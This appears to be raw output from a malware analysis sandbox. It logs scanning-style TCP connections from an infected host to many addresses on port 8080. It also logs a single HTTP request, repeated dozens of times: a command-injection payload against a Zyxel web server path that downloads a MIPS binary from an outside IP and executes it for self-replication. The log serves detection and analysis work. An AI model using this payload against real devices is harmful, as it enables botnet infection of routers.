            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 64.58.246.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 106.226.20.22:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 213.110.255.64:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 213.46.254.182:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 93.14.190.106:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 65.39.155.46:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 204.193.10.212:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 76.145.92.42:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 180.237.55.240:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 195.49.113.114:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 81.152.26.213:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 123.229.195.236:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 205.158.118.161:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 87.123.15.124:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 51.39.251.179:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 43.248.232.158:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 157.178.212.32:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 96.217.188.183:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 83.174.155.158:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 194.95.27.45:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 98.136.125.31:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 110.85.176.114:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 63.125.252.103:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 8.111.194.0:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 66.140.174.234:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 1.34.238.67:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 205.63.156.75:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 189.133.147.20:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 112.226.158.24:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 197.98.129.76:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 61.23.188.167:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 176.143.238.153:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 145.26.164.178:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 179.144.25.77:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 176.209.152.113:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 123.23.168.123:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 82.150.141.22:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 1.53.19.147:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 77.122.146.54:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 90.64.138.75:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 158.81.204.135:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 212.58.36.223:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 59.61.189.244:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 117.250.85.126:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 141.94.34.180:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 24.201.113.41:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 24.224.199.50:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 86.168.150.108:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 222.171.25.5:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 79.238.205.230:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 87.31.5.188:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 113.71.98.86:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 102.107.133.225:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 72.220.37.47:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 156.142.13.23:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 35.11.102.191:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 98.135.232.209:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 170.122.125.226:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 184.8.1.137:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 186.221.179.135:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 66.100.161.224:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 171.11.105.32:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 5.92.112.51:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 71.240.80.64:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 19.186.155.234:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 109.111.210.250:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 123.22.239.153:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 102.16.178.13:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 181.157.238.97:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 162.100.39.108:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 14.100.144.184:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 129.17.186.69:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 145.131.1.23:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 9.230.208.247:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 114.77.78.68:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 151.52.215.187:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 91.5.53.200:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 156.105.136.194:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 139.116.220.229:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 161.254.86.128:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 159.2.7.249:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 84.225.138.114:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 165.49.54.51:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 95.10.92.164:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 84.243.85.59:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 219.129.25.178:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 188.35.140.80:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 106.168.62.121:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 152.4.52.107:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 77.102.214.77:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 157.141.2.124:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 95.51.59.74:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 199.150.235.29:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 183.1.147.137:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 133.102.223.199:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 211.161.162.107:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 189.144.195.88:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 200.117.131.239:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 45.231.117.54:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 120.48.111.2:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 67.107.233.135:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 202.47.191.190:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 36.9.176.206:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 171.254.208.97:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 183.29.67.217:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 157.38.146.99:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 124.224.64.245:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 83.113.200.239:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 44.93.17.201:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 222.32.203.52:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 14.222.104.242:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 40.107.152.88:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 175.215.152.188:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 14.255.35.156:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 78.227.65.208:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 160.248.77.247:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 96.206.188.35:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 92.45.14.126:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 109.159.154.191:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 156.53.160.194:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 161.45.52.65:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 92.54.116.0:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 13.245.204.10:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 123.117.205.237:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 9.225.5.24:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 13.36.14.250:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 201.92.7.111:8080
            Source: global trafficTCP traffic: 192.168.2.23:22191 -> 188.225.142.153:8080
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
